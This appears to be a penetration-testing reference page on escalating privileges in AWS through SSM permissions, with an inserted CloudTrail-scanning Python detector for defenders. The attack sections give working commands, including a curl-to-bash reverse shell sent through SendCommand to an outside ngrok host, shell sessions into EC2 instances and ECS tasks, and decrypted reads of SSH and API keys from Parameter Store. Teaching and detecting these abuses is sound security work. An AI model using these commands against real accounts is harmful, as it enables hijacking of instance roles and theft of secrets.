AWS - SSM Privesc


SSM

For more information about SSM check:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

ssm:SendCommand

An attacker with the permission ssm:SendCommand can execute commands in instances running the Amazon SSM Agent and compromise the IAM Role running inside it.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

In case you are using this technique to escalate privileges inside an EC2 instance that is already compromised, you can just capture the rev shell locally with:

# If you are in the machine you can capture the reverse shell inside of it
nc -lvnp 4444 # Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Potential Impact: Direct privesc to the EC2 IAM roles attached to instances running SSM Agents.

ssm:StartSession

An attacker with the permission ssm:StartSession can start an SSH-like session in instances running the Amazon SSM Agent and compromise the IAM Role running inside it.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

To start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.

Privesc to ECS

When ECS tasks run with ExecuteCommand enabled, users with enough permissions can use ecs execute-command to execute a command inside the container. According to the documentation, this is done by creating a secure channel between the device you use to initiate the "exec" command and the target container with SSM Session Manager (the SSM Session Manager Plugin is required for this to work). Therefore, users with ssm:StartSession will be able to get a shell inside ECS tasks that have that option enabled by simply running:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Potential Impact: Direct privesc to the ECS IAM roles attached to running tasks with ExecuteCommand enabled.

ssm:ResumeSession

An attacker with the permission ssm:ResumeSession can resume an SSH-like session in instances running the Amazon SSM Agent that have a disconnected SSM session and compromise the IAM Role running inside it.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconnected sessions.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

An attacker with the mentioned permissions will be able to list the SSM parameters and read them in plaintext. In these parameters you can frequently find sensitive information such as SSH keys or API keys.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Potential Impact: Find sensitive information inside the parameters.
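Every abuse above (SendCommand with AWS-RunShellScript, StartSession/ResumeSession including the ecs: exec targets, and decrypted reads of key-like parameters such as id_rsa) is an SSM API call, so it lands in CloudTrail. The following detector is an added example for defenders, not code from the page; the records it scans are constructed and only follow CloudTrail's JSON shape (eventSource, eventName, userIdentity, requestParameters), and the command text itself is not assumed to be present in the record.

```python
import re

# Parameter names worth alerting on when read decrypted (page example: "id_rsa").
KEY_LIKE = re.compile(r"(id_rsa|ssh|api[_-]?key|secret|token|password)", re.I)
REMOTE_EXEC_DOCS = {"AWS-RunShellScript", "AWS-RunPowerShellScript"}

def inspect_event(event):
    """Return findings (list of str) for one CloudTrail record, [] if benign."""
    if event.get("eventSource") != "ssm.amazonaws.com":
        return []
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    actor = (event.get("userIdentity") or {}).get("arn", "<unknown>")
    if name == "SendCommand" and params.get("documentName") in REMOTE_EXEC_DOCS:
        targets = params.get("instanceIds") or []
        return [f"{actor}: SendCommand {params['documentName']} -> {targets}"]
    if name in ("StartSession", "ResumeSession"):
        target = params.get("target") or params.get("sessionId", "?")
        kind = "ECS exec" if str(target).startswith("ecs:") else "instance"
        return [f"{actor}: {name} {kind} session -> {target}"]
    if name in ("GetParameter", "GetParameters") and params.get("withDecryption"):
        names = params.get("names") or [params.get("name", "")]
        hits = [n for n in names if KEY_LIKE.search(n or "")]
        return [f"{actor}: decrypted read of key-like parameter {n}" for n in hits]
    return []

def scan_trail(records):
    """Run inspect_event over a list of records and collect all findings."""
    out = []
    for r in records:
        out.extend(inspect_event(r))
    return out

# CONSTRUCTED sample records: CloudTrail-shaped, all values made up.
SAMPLE_RECORDS = [
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0abc"]}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "StartSession",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {"target": "ecs:prod_task1_rt1"}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "GetParameter",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {"name": "id_rsa", "withDecryption": True}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "DescribeInstanceInformation",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": None},
]

if __name__ == "__main__":
    for finding in scan_trail(SAMPLE_RECORDS):
        print(finding)
```

In production, pair the SendCommand finding with `aws ssm list-command-invocations` / `get-command-invocation` (shown below) to recover what was actually run, and baseline known automation principals to keep the StartSession rule from paging on routine operator sessions.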

ssm:ListCommands

An attacker with this permission can list all the commands sent and hopefully find sensitive information in them.

aws ssm list-commands

Potential Impact: Find sensitive information inside the command lines.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

An attacker with these permissions can list all the commands sent and read the output they generated, hoping to find sensitive information in it.

# You can use either of these two options to get the command-id and instance-id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Potential Impact: Find sensitive information inside the output of the commands.

Codebuild

You can also use SSM to get inside a CodeBuild project while it is being built:

AWS - Codebuild Privesc